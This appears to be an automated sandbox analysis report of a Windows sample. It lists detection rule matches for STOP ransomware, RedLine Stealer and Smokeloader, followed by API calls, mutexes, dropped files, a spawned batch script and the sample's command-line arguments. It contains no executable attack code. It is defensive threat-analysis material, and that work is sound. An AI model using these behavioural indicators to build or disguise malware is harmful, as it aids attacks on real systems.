Source: 23.2.33A3.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: Windows_Ransomware_Stop_1e8d48ff reference_sample = 821b27488f296e15542b13ac162db4a354cbf4386b6cd40a550c4a71f4d628f3, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Ransomware.Stop, fingerprint = 715888e3e13aaa33f2fd73beef2c260af13e9726cb4b43d349333e3259bf64eb, id = 1e8d48ff-e0ab-478d-8268-a11f2e87ab79, last_modified = 2021-08-23
Source: 23.2.33A3.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_STOP snort2_sid = 920113, author = ditekSHen, description = Detects STOP ransomware, clamav_sig = MALWARE.Win.Ransomware.STOP, snort3_sid = 920111
Source: 15.2.33A3.exe.4a315a0.1.unpack, type: UNPACKEDPE	Matched rule: Windows_Ransomware_Stop_1e8d48ff reference_sample = 821b27488f296e15542b13ac162db4a354cbf4386b6cd40a550c4a71f4d628f3, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Ransomware.Stop, fingerprint = 715888e3e13aaa33f2fd73beef2c260af13e9726cb4b43d349333e3259bf64eb, id = 1e8d48ff-e0ab-478d-8268-a11f2e87ab79, last_modified = 2021-08-23
Source: 15.2.33A3.exe.4a315a0.1.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_STOP snort2_sid = 920113, author = ditekSHen, description = Detects STOP ransomware, clamav_sig = MALWARE.Win.Ransomware.STOP, snort3_sid = 920111
Source: 23.2.33A3.exe.400000.0.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Ransomware_Stop_1e8d48ff reference_sample = 821b27488f296e15542b13ac162db4a354cbf4386b6cd40a550c4a71f4d628f3, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Ransomware.Stop, fingerprint = 715888e3e13aaa33f2fd73beef2c260af13e9726cb4b43d349333e3259bf64eb, id = 1e8d48ff-e0ab-478d-8268-a11f2e87ab79, last_modified = 2021-08-23
Source: 23.2.33A3.exe.400000.0.raw.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_STOP snort2_sid = 920113, author = ditekSHen, description = Detects STOP ransomware, clamav_sig = MALWARE.Win.Ransomware.STOP, snort3_sid = 920111
Source: 16.2.33A3.exe.400000.0.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Ransomware_Stop_1e8d48ff reference_sample = 821b27488f296e15542b13ac162db4a354cbf4386b6cd40a550c4a71f4d628f3, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Ransomware.Stop, fingerprint = 715888e3e13aaa33f2fd73beef2c260af13e9726cb4b43d349333e3259bf64eb, id = 1e8d48ff-e0ab-478d-8268-a11f2e87ab79, last_modified = 2021-08-23
Source: 16.2.33A3.exe.400000.0.raw.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_STOP snort2_sid = 920113, author = ditekSHen, description = Detects STOP ransomware, clamav_sig = MALWARE.Win.Ransomware.STOP, snort3_sid = 920111
Source: 25.2.33A3.exe.49e15a0.1.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Ransomware_Stop_1e8d48ff reference_sample = 821b27488f296e15542b13ac162db4a354cbf4386b6cd40a550c4a71f4d628f3, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Ransomware.Stop, fingerprint = 715888e3e13aaa33f2fd73beef2c260af13e9726cb4b43d349333e3259bf64eb, id = 1e8d48ff-e0ab-478d-8268-a11f2e87ab79, last_modified = 2021-08-23
Source: 25.2.33A3.exe.49e15a0.1.raw.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_STOP snort2_sid = 920113, author = ditekSHen, description = Detects STOP ransomware, clamav_sig = MALWARE.Win.Ransomware.STOP, snort3_sid = 920111
Source: 14.2.33A3.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: Windows_Ransomware_Stop_1e8d48ff reference_sample = 821b27488f296e15542b13ac162db4a354cbf4386b6cd40a550c4a71f4d628f3, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Ransomware.Stop, fingerprint = 715888e3e13aaa33f2fd73beef2c260af13e9726cb4b43d349333e3259bf64eb, id = 1e8d48ff-e0ab-478d-8268-a11f2e87ab79, last_modified = 2021-08-23
Source: 14.2.33A3.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_STOP snort2_sid = 920113, author = ditekSHen, description = Detects STOP ransomware, clamav_sig = MALWARE.Win.Ransomware.STOP, snort3_sid = 920111
Source: 9.2.33A3.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: Windows_Ransomware_Stop_1e8d48ff reference_sample = 821b27488f296e15542b13ac162db4a354cbf4386b6cd40a550c4a71f4d628f3, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Ransomware.Stop, fingerprint = 715888e3e13aaa33f2fd73beef2c260af13e9726cb4b43d349333e3259bf64eb, id = 1e8d48ff-e0ab-478d-8268-a11f2e87ab79, last_modified = 2021-08-23
Source: 9.2.33A3.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_STOP snort2_sid = 920113, author = ditekSHen, description = Detects STOP ransomware, clamav_sig = MALWARE.Win.Ransomware.STOP, snort3_sid = 920111
Source: 00000004.00000002.2342522385.0000000002E8B000.00000040.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_RedLineStealer_ed346e4c reference_sample = a91c1d3965f11509d1c1125210166b824a79650f29ea203983fffb5f8900858c, os = windows, severity = x86, creation_date = 2022-02-17, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.RedLineStealer, fingerprint = 834c13b2e0497787e552bb1318664496d286e7cf57b4661e5e07bf1cffe61b82, id = ed346e4c-7890-41ee-8648-f512682fe20e, last_modified = 2022-04-12
Source: 00000010.00000002.3250613248.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Ransomware_Stop_1e8d48ff reference_sample = 821b27488f296e15542b13ac162db4a354cbf4386b6cd40a550c4a71f4d628f3, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Ransomware.Stop, fingerprint = 715888e3e13aaa33f2fd73beef2c260af13e9726cb4b43d349333e3259bf64eb, id = 1e8d48ff-e0ab-478d-8268-a11f2e87ab79, last_modified = 2021-08-23
Source: 00000010.00000002.3250613248.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: MALWARE_Win_STOP snort2_sid = 920113, author = ditekSHen, description = Detects STOP ransomware, clamav_sig = MALWARE.Win.Ransomware.STOP, snort3_sid = 920111
Source: 0000000D.00000002.2432836380.0000000002EB7000.00000040.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_RedLineStealer_ed346e4c reference_sample = a91c1d3965f11509d1c1125210166b824a79650f29ea203983fffb5f8900858c, os = windows, severity = x86, creation_date = 2022-02-17, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.RedLineStealer, fingerprint = 834c13b2e0497787e552bb1318664496d286e7cf57b4661e5e07bf1cffe61b82, id = ed346e4c-7890-41ee-8648-f512682fe20e, last_modified = 2022-04-12
Source: 00000016.00000002.2529798141.0000000002EAE000.00000040.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_RedLineStealer_ed346e4c reference_sample = a91c1d3965f11509d1c1125210166b824a79650f29ea203983fffb5f8900858c, os = windows, severity = x86, creation_date = 2022-02-17, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.RedLineStealer, fingerprint = 834c13b2e0497787e552bb1318664496d286e7cf57b4661e5e07bf1cffe61b82, id = ed346e4c-7890-41ee-8648-f512682fe20e, last_modified = 2022-04-12
Source: 00000004.00000002.2342373288.0000000002E30000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Smokeloader_4e31426e reference_sample = 1ce643981821b185b8ad73b798ab5c71c6c40e1f547b8e5b19afdaa4ca2a5174, os = windows, severity = x86, creation_date = 2021-07-21, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Smokeloader, fingerprint = cf6d8615643198bc53527cb9581e217f8a39760c2e695980f808269ebe791277, id = 4e31426e-d62e-4b6d-911b-4223e1f6adef, last_modified = 2021-08-23
Source: 00000000.00000002.2068190950.0000000002E20000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Smokeloader_3687686f reference_sample = 8b3014ecd962a335b246f6c70fc820247e8bdaef98136e464b1fdb824031eef7, os = windows, severity = x86, creation_date = 2021-07-21, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Smokeloader, fingerprint = 0f483f9f79ae29b944825c1987366d7b450312f475845e2242a07674580918bc, id = 3687686f-8fbf-4f09-9afa-612ee65dc86c, last_modified = 2021-08-23
Source: 0000001A.00000002.2629001294.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Ransomware_Stop_1e8d48ff reference_sample = 821b27488f296e15542b13ac162db4a354cbf4386b6cd40a550c4a71f4d628f3, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Ransomware.Stop, fingerprint = 715888e3e13aaa33f2fd73beef2c260af13e9726cb4b43d349333e3259bf64eb, id = 1e8d48ff-e0ab-478d-8268-a11f2e87ab79, last_modified = 2021-08-23
Source: 0000001A.00000002.2629001294.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: MALWARE_Win_STOP snort2_sid = 920113, author = ditekSHen, description = Detects STOP ransomware, clamav_sig = MALWARE.Win.Ransomware.STOP, snort3_sid = 920111
Source: 00000000.00000002.2068864914.0000000002ECB000.00000040.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_RedLineStealer_ed346e4c reference_sample = a91c1d3965f11509d1c1125210166b824a79650f29ea203983fffb5f8900858c, os = windows, severity = x86, creation_date = 2022-02-17, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.RedLineStealer, fingerprint = 834c13b2e0497787e552bb1318664496d286e7cf57b4661e5e07bf1cffe61b82, id = ed346e4c-7890-41ee-8648-f512682fe20e, last_modified = 2022-04-12
Source: 00000004.00000002.2342341845.0000000002E20000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Smokeloader_3687686f reference_sample = 8b3014ecd962a335b246f6c70fc820247e8bdaef98136e464b1fdb824031eef7, os = windows, severity = x86, creation_date = 2021-07-21, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Smokeloader, fingerprint = 0f483f9f79ae29b944825c1987366d7b450312f475845e2242a07674580918bc, id = 3687686f-8fbf-4f09-9afa-612ee65dc86c, last_modified = 2021-08-23
Source: 0000000F.00000002.2446025490.0000000004A30000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Ransomware_Stop_1e8d48ff reference_sample = 821b27488f296e15542b13ac162db4a354cbf4386b6cd40a550c4a71f4d628f3, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Ransomware.Stop, fingerprint = 715888e3e13aaa33f2fd73beef2c260af13e9726cb4b43d349333e3259bf64eb, id = 1e8d48ff-e0ab-478d-8268-a11f2e87ab79, last_modified = 2021-08-23
Source: 00000008.00000002.2396691282.0000000004A00000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Ransomware_Stop_1e8d48ff reference_sample = 821b27488f296e15542b13ac162db4a354cbf4386b6cd40a550c4a71f4d628f3, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Ransomware.Stop, fingerprint = 715888e3e13aaa33f2fd73beef2c260af13e9726cb4b43d349333e3259bf64eb, id = 1e8d48ff-e0ab-478d-8268-a11f2e87ab79, last_modified = 2021-08-23
Source: 00000004.00000002.2342416415.0000000002E51000.00000004.10000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Smokeloader_4e31426e reference_sample = 1ce643981821b185b8ad73b798ab5c71c6c40e1f547b8e5b19afdaa4ca2a5174, os = windows, severity = x86, creation_date = 2021-07-21, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Smokeloader, fingerprint = cf6d8615643198bc53527cb9581e217f8a39760c2e695980f808269ebe791277, id = 4e31426e-d62e-4b6d-911b-4223e1f6adef, last_modified = 2021-08-23
Source: 00000000.00000002.2068350928.0000000002E51000.00000004.10000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Smokeloader_4e31426e reference_sample = 1ce643981821b185b8ad73b798ab5c71c6c40e1f547b8e5b19afdaa4ca2a5174, os = windows, severity = x86, creation_date = 2021-07-21, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Smokeloader, fingerprint = cf6d8615643198bc53527cb9581e217f8a39760c2e695980f808269ebe791277, id = 4e31426e-d62e-4b6d-911b-4223e1f6adef, last_modified = 2021-08-23
Source: 0000001E.00000002.3280589230.000000000CAC1000.00000020.00000001.00040000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Smokeloader_4e31426e reference_sample = 1ce643981821b185b8ad73b798ab5c71c6c40e1f547b8e5b19afdaa4ca2a5174, os = windows, severity = x86, creation_date = 2021-07-21, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Smokeloader, fingerprint = cf6d8615643198bc53527cb9581e217f8a39760c2e695980f808269ebe791277, id = 4e31426e-d62e-4b6d-911b-4223e1f6adef, last_modified = 2021-08-23
Source: 0000000E.00000002.2442763090.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Ransomware_Stop_1e8d48ff reference_sample = 821b27488f296e15542b13ac162db4a354cbf4386b6cd40a550c4a71f4d628f3, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Ransomware.Stop, fingerprint = 715888e3e13aaa33f2fd73beef2c260af13e9726cb4b43d349333e3259bf64eb, id = 1e8d48ff-e0ab-478d-8268-a11f2e87ab79, last_modified = 2021-08-23
Source: 0000000E.00000002.2442763090.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: MALWARE_Win_STOP snort2_sid = 920113, author = ditekSHen, description = Detects STOP ransomware, clamav_sig = MALWARE.Win.Ransomware.STOP, snort3_sid = 920111
Source: 00000009.00000002.2422576325.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Ransomware_Stop_1e8d48ff reference_sample = 821b27488f296e15542b13ac162db4a354cbf4386b6cd40a550c4a71f4d628f3, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Ransomware.Stop, fingerprint = 715888e3e13aaa33f2fd73beef2c260af13e9726cb4b43d349333e3259bf64eb, id = 1e8d48ff-e0ab-478d-8268-a11f2e87ab79, last_modified = 2021-08-23
Source: 00000009.00000002.2422576325.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: MALWARE_Win_STOP snort2_sid = 920113, author = ditekSHen, description = Detects STOP ransomware, clamav_sig = MALWARE.Win.Ransomware.STOP, snort3_sid = 920111
Source: 00000019.00000002.2616958897.000000000494A000.00000040.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_RedLineStealer_ed346e4c reference_sample = a91c1d3965f11509d1c1125210166b824a79650f29ea203983fffb5f8900858c, os = windows, severity = x86, creation_date = 2022-02-17, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.RedLineStealer, fingerprint = 834c13b2e0497787e552bb1318664496d286e7cf57b4661e5e07bf1cffe61b82, id = ed346e4c-7890-41ee-8648-f512682fe20e, last_modified = 2022-04-12
Source: 00000016.00000002.2530314082.0000000004A00000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Ransomware_Stop_1e8d48ff reference_sample = 821b27488f296e15542b13ac162db4a354cbf4386b6cd40a550c4a71f4d628f3, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Ransomware.Stop, fingerprint = 715888e3e13aaa33f2fd73beef2c260af13e9726cb4b43d349333e3259bf64eb, id = 1e8d48ff-e0ab-478d-8268-a11f2e87ab79, last_modified = 2021-08-23
Source: 00000008.00000002.2396309012.0000000002FC7000.00000040.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_RedLineStealer_ed346e4c reference_sample = a91c1d3965f11509d1c1125210166b824a79650f29ea203983fffb5f8900858c, os = windows, severity = x86, creation_date = 2022-02-17, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.RedLineStealer, fingerprint = 834c13b2e0497787e552bb1318664496d286e7cf57b4661e5e07bf1cffe61b82, id = ed346e4c-7890-41ee-8648-f512682fe20e, last_modified = 2022-04-12
Source: 00000019.00000002.2617025690.00000000049E0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Ransomware_Stop_1e8d48ff reference_sample = 821b27488f296e15542b13ac162db4a354cbf4386b6cd40a550c4a71f4d628f3, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Ransomware.Stop, fingerprint = 715888e3e13aaa33f2fd73beef2c260af13e9726cb4b43d349333e3259bf64eb, id = 1e8d48ff-e0ab-478d-8268-a11f2e87ab79, last_modified = 2021-08-23
Source: 00000029.00000002.3255503396.00000000048C0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Smokeloader_3687686f reference_sample = 8b3014ecd962a335b246f6c70fc820247e8bdaef98136e464b1fdb824031eef7, os = windows, severity = x86, creation_date = 2021-07-21, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Smokeloader, fingerprint = 0f483f9f79ae29b944825c1987366d7b450312f475845e2242a07674580918bc, id = 3687686f-8fbf-4f09-9afa-612ee65dc86c, last_modified = 2021-08-23
Source: 0000000D.00000002.2433122057.0000000004A40000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Ransomware_Stop_1e8d48ff reference_sample = 821b27488f296e15542b13ac162db4a354cbf4386b6cd40a550c4a71f4d628f3, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Ransomware.Stop, fingerprint = 715888e3e13aaa33f2fd73beef2c260af13e9726cb4b43d349333e3259bf64eb, id = 1e8d48ff-e0ab-478d-8268-a11f2e87ab79, last_modified = 2021-08-23
Source: 00000000.00000002.2068279346.0000000002E30000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Smokeloader_4e31426e reference_sample = 1ce643981821b185b8ad73b798ab5c71c6c40e1f547b8e5b19afdaa4ca2a5174, os = windows, severity = x86, creation_date = 2021-07-21, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Smokeloader, fingerprint = cf6d8615643198bc53527cb9581e217f8a39760c2e695980f808269ebe791277, id = 4e31426e-d62e-4b6d-911b-4223e1f6adef, last_modified = 2021-08-23
Source: 00000029.00000002.3254939244.0000000002F2E000.00000040.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_RedLineStealer_ed346e4c reference_sample = a91c1d3965f11509d1c1125210166b824a79650f29ea203983fffb5f8900858c, os = windows, severity = x86, creation_date = 2022-02-17, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.RedLineStealer, fingerprint = 834c13b2e0497787e552bb1318664496d286e7cf57b4661e5e07bf1cffe61b82, id = ed346e4c-7890-41ee-8648-f512682fe20e, last_modified = 2022-04-12
Source: 0000000F.00000002.2445927456.0000000004995000.00000040.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_RedLineStealer_ed346e4c reference_sample = a91c1d3965f11509d1c1125210166b824a79650f29ea203983fffb5f8900858c, os = windows, severity = x86, creation_date = 2022-02-17, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.RedLineStealer, fingerprint = 834c13b2e0497787e552bb1318664496d286e7cf57b4661e5e07bf1cffe61b82, id = ed346e4c-7890-41ee-8648-f512682fe20e, last_modified = 2022-04-12
Source: 00000017.00000002.2541887297.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Ransomware_Stop_1e8d48ff reference_sample = 821b27488f296e15542b13ac162db4a354cbf4386b6cd40a550c4a71f4d628f3, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Ransomware.Stop, fingerprint = 715888e3e13aaa33f2fd73beef2c260af13e9726cb4b43d349333e3259bf64eb, id = 1e8d48ff-e0ab-478d-8268-a11f2e87ab79, last_modified = 2021-08-23
Source: 00000017.00000002.2541887297.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: MALWARE_Win_STOP snort2_sid = 920113, author = ditekSHen, description = Detects STOP ransomware, clamav_sig = MALWARE.Win.Ransomware.STOP, snort3_sid = 920111
Source: Process Memory Space: 33A3.exe PID: 4400, type: MEMORYSTR	Matched rule: Windows_Ransomware_Stop_1e8d48ff reference_sample = 821b27488f296e15542b13ac162db4a354cbf4386b6cd40a550c4a71f4d628f3, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Ransomware.Stop, fingerprint = 715888e3e13aaa33f2fd73beef2c260af13e9726cb4b43d349333e3259bf64eb, id = 1e8d48ff-e0ab-478d-8268-a11f2e87ab79, last_modified = 2021-08-23
Source: Process Memory Space: 33A3.exe PID: 3556, type: MEMORYSTR	Matched rule: Windows_Ransomware_Stop_1e8d48ff reference_sample = 821b27488f296e15542b13ac162db4a354cbf4386b6cd40a550c4a71f4d628f3, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Ransomware.Stop, fingerprint = 715888e3e13aaa33f2fd73beef2c260af13e9726cb4b43d349333e3259bf64eb, id = 1e8d48ff-e0ab-478d-8268-a11f2e87ab79, last_modified = 2021-08-23
Source: Process Memory Space: 33A3.exe PID: 3780, type: MEMORYSTR	Matched rule: Windows_Ransomware_Stop_1e8d48ff reference_sample = 821b27488f296e15542b13ac162db4a354cbf4386b6cd40a550c4a71f4d628f3, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Ransomware.Stop, fingerprint = 715888e3e13aaa33f2fd73beef2c260af13e9726cb4b43d349333e3259bf64eb, id = 1e8d48ff-e0ab-478d-8268-a11f2e87ab79, last_modified = 2021-08-23
Source: Process Memory Space: 33A3.exe PID: 5964, type: MEMORYSTR	Matched rule: Windows_Ransomware_Stop_1e8d48ff reference_sample = 821b27488f296e15542b13ac162db4a354cbf4386b6cd40a550c4a71f4d628f3, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Ransomware.Stop, fingerprint = 715888e3e13aaa33f2fd73beef2c260af13e9726cb4b43d349333e3259bf64eb, id = 1e8d48ff-e0ab-478d-8268-a11f2e87ab79, last_modified = 2021-08-23
Source: Process Memory Space: 33A3.exe PID: 5328, type: MEMORYSTR	Matched rule: Windows_Ransomware_Stop_1e8d48ff reference_sample = 821b27488f296e15542b13ac162db4a354cbf4386b6cd40a550c4a71f4d628f3, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Ransomware.Stop, fingerprint = 715888e3e13aaa33f2fd73beef2c260af13e9726cb4b43d349333e3259bf64eb, id = 1e8d48ff-e0ab-478d-8268-a11f2e87ab79, last_modified = 2021-08-23
Source: Process Memory Space: 33A3.exe PID: 2104, type: MEMORYSTR	Matched rule: Windows_Ransomware_Stop_1e8d48ff reference_sample = 821b27488f296e15542b13ac162db4a354cbf4386b6cd40a550c4a71f4d628f3, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Ransomware.Stop, fingerprint = 715888e3e13aaa33f2fd73beef2c260af13e9726cb4b43d349333e3259bf64eb, id = 1e8d48ff-e0ab-478d-8268-a11f2e87ab79, last_modified = 2021-08-23
Source: Process Memory Space: 33A3.exe PID: 2284, type: MEMORYSTR	Matched rule: Windows_Ransomware_Stop_1e8d48ff reference_sample = 821b27488f296e15542b13ac162db4a354cbf4386b6cd40a550c4a71f4d628f3, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Ransomware.Stop, fingerprint = 715888e3e13aaa33f2fd73beef2c260af13e9726cb4b43d349333e3259bf64eb, id = 1e8d48ff-e0ab-478d-8268-a11f2e87ab79, last_modified = 2021-08-23
Source: Process Memory Space: 33A3.exe PID: 5560, type: MEMORYSTR	Matched rule: Windows_Ransomware_Stop_1e8d48ff reference_sample = 821b27488f296e15542b13ac162db4a354cbf4386b6cd40a550c4a71f4d628f3, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Ransomware.Stop, fingerprint = 715888e3e13aaa33f2fd73beef2c260af13e9726cb4b43d349333e3259bf64eb, id = 1e8d48ff-e0ab-478d-8268-a11f2e87ab79, last_modified = 2021-08-23
Source: Process Memory Space: 33A3.exe PID: 5680, type: MEMORYSTR	Matched rule: Windows_Ransomware_Stop_1e8d48ff reference_sample = 821b27488f296e15542b13ac162db4a354cbf4386b6cd40a550c4a71f4d628f3, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Ransomware.Stop, fingerprint = 715888e3e13aaa33f2fd73beef2c260af13e9726cb4b43d349333e3259bf64eb, id = 1e8d48ff-e0ab-478d-8268-a11f2e87ab79, last_modified = 2021-08-23
Source: Process Memory Space: 33A3.exe PID: 4276, type: MEMORYSTR	Matched rule: Windows_Ransomware_Stop_1e8d48ff reference_sample = 821b27488f296e15542b13ac162db4a354cbf4386b6cd40a550c4a71f4d628f3, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Ransomware.Stop, fingerprint = 715888e3e13aaa33f2fd73beef2c260af13e9726cb4b43d349333e3259bf64eb, id = 1e8d48ff-e0ab-478d-8268-a11f2e87ab79, last_modified = 2021-08-23

Source: classification engine

Classification label: mal100.rans.troj.evad.winEXE@38/296@18/11

Source: C:\Users\user\AppData\Local\Temp\33A3.exe

Code function: 9_2_00411900 GetLastError,FormatMessageW,lstrlenW,lstrlenW,lstrlenW,LocalAlloc,lstrcpyW,lstrcatW,lstrcatW,lstrcatW,lstrcatW,lstrcatW,lstrlenW,_memset,lstrcpynW,MessageBoxW,LocalFree,LocalFree,LocalFree,

9_2_00411900

Source: C:\Users\user\Desktop\XVM5nluelx.exe

Code function: 0_2_02ED2423 CreateToolhelp32Snapshot,Module32First,

0_2_02ED2423

Source: C:\Users\user\AppData\Local\Temp\33A3.exe

Code function: 9_2_0040D240 CoInitialize,CoInitializeSecurity,CoCreateInstance,VariantInit,VariantInit,VariantInit,VariantInit,VariantInit,VariantClear,VariantClear,VariantClear,VariantClear,CoUninitialize,CoUninitialize,CoUninitialize,__time64,__localtime64,_wcsftime,VariantInit,VariantInit,VariantClear,VariantClear,VariantClear,VariantClear,swprintf,CoUninitialize,CoUninitialize,

9_2_0040D240

Source: C:\Windows\explorer.exe

File created: C:\Users\user\AppData\Roaming\dejcbcc

Jump to behavior

Source: C:\Users\user\AppData\Local\914917ab-8c1c-4917-bfda-a5e2f0055a1d\33A3.exe	Mutant created: \Sessions\1\BaseNamedObjects\{1D6FC66E-D1F3-422C-8A53-C0BBCF3D900D}
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:1628:120:WilError_03
Source: C:\Windows\System32\WerFault.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\WERReportingForProcess1028
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:2716:120:WilError_03

Source: C:\Windows\explorer.exe

File created: C:\Users\user\AppData\Local\Temp\B88.tmp

Jump to behavior

Source: C:\Windows\explorer.exe

Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Users\user\AppData\Local\Temp\B88.bat" "

Source: unknown

Process created: C:\Windows\explorer.exe

Source: C:\Users\user\AppData\Local\Temp\33A3.exe	Command line argument: --Admin	9_2_00419F90
Source: C:\Users\user\AppData\Local\Temp\33A3.exe	Command line argument: IsAutoStart	9_2_00419F90
Source: C:\Users\user\AppData\Local\Temp\33A3.exe	Command line argument: IsTask	9_2_00419F90
Source: C:\Users\user\AppData\Local\Temp\33A3.exe	Command line argument: --ForNetRes	9_2_00419F90
Source: C:\Users\user\AppData\Local\Temp\33A3.exe	Command line argument: IsAutoStart	9_2_00419F90
Source: C:\Users\user\AppData\Local\Temp\33A3.exe	Command line argument: IsTask	9_2_00419F90
Source: C:\Users\user\AppData\Local\Temp\33A3.exe	Command line argument: --Task	9_2_00419F90
Source: C:\Users\user\AppData\Local\Temp\33A3.exe	Command line argument: --AutoStart	9_2_00419F90
